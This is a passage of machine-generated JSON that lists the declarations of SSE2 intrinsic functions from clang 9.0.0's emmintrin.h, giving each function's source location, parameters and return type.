"return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpeq_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:426:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmplt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmple_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:467:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpgt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:488:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpge_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:509:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpord_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpunord_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:556:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpneq_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:577:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpnlt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:598:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpnle_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:619:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpngt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:640:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpnge_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:661:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpeq_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:684:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmplt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:709:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmple_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:734:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpgt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:759:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpge_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:785:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpord_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:813:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpunord_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:841:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpneq_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:866:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpnlt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:891:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpnle_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:916:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpngt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:941:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cmpnge_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:967:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_comieq_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:992:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comilt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1018:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comile_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1044:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comigt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1070:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comige_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1096:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_comineq_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1122:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomieq_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1146:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomilt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1172:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomile_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1198:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomigt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1224:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomige_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1250:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_ucomineq_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1276:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1295:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1315:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1338:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1358:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtsd_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1375:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtsd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtsi32_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1423:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtss_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1449:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1473:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvttsd_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1491:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtpd_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1508:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvttpd_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1528:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvtpi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1545:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtsd_f64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1562:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1579:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_load1_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1597:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_loadr_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1623:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1641:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_loadu_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1661:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_loadu_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1682:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_loadu_si16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1703:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_load_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1724:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_loadh_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1751:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_loadl_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1778:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_undefined_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1799:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_set_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1819:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_set1_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1837:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_set_pd1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1855:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_set_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1875:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_setr_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1896:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_setzero_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1911:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_move_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1932:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_store_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1950:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_store_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1972:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_store1_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:1992:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_store_pd1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2013:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2031:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storer_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2054:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeh_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2072:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storel_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2092:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dp", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2117:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2139:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2161:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_add_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2179:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2201:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2222:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_adds_epi16", "ns": 0, "location": 